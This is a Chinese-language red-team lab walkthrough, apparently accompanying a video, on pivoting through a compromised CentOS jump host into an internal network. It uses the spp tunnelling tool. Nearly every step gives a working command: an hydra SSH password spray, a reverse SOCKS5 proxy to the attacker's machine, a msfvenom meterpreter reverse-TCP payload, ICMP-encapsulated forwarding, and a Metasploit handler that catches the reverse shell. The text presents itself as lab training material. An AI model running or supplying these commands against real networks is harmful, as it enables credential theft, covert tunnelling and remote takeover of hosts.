0.实际操作视频,请移步
红队渗透-内网穿透-spp内网穿透之socks反向代理渗透内网和正向代理反弹shell上线msf_哔哩哔哩_bilibili
声明:请遵守网络安全法,若学员因此作出任何危害网络安全行为后果自负,与我本人无关。
靶场说明
kali攻击机 外网 ip 192.168.1.5
centos 跳板机 外网192.168.1.24 内网 10.10.10.88
内网主机web 10.10.10.13

1.kali运行spp启动server模式tcp监听8888端口,同时监听ricmp协议
./spp -type server -proto tcp -listen :8888 -proto ricmp -listen 0.0.0.0 -nolog 1 -noprint 1 &
2.kali通过密码喷洒获取centos的账号密码
└─# hydra -L /test/password/users.txt -P /test/password/passwords.txt ssh://192.168.1.24
3.ssh登录跳板机,内网信息收集获取内网存活主机和端口,目标机器存活。
4.上传spp到跳板机centos,反向socks5代理,进入内网
# ./spp -name "16" -type reverse_socks5_client -server 192.168.1.5:8888 -fromaddr :1080 -proxyproto tcp -proto tcp -nolog 1 -noprint 1 &
5.设置proxychains
6.目标机器10.10.10.13的8080端口存在web漏洞,获取webshell
7.msfvenom 制作木马,木马运行后,反向shell到跳板机的8888端口,上传到目标机器10.10.10.13
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.10.88 lport=8888 -f exe > shiliu.exe
8.跳板机centos运行spp tcp正向代理封装在ricmp协议内
./spp -name "shiliu" -type proxy_client -server 192.168.1.5 -fromaddr :8888 -toaddr :7777 -proxyproto tcp -proto ricmp -nolog 1 -noprint 1 &
9.msf监听7777端口
msf6 exploit(multi/handler) >use exploit/multi/handler
msf6 exploit(multi/handler) >set payload windows/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set lhost 0.0.0.0
msf6 exploit(multi/handler) > set lport 7777
run
10.目标机运行shiliu.exe,msf收到反弹shell